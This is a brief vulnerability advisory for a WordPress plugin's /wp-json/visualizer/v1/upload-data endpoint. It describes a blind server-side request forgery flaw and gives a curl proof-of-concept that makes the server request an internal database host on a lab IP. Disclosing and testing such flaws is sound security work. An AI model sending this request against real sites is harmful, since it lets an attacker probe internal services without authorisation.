This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
curl -i -s -X $‘POST’ \ -H $‘Host: 192.168.158.128:8000’ \ --data-binary $‘{"url":"http://db:3306"}’ \ $‘http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data’ See the references for more details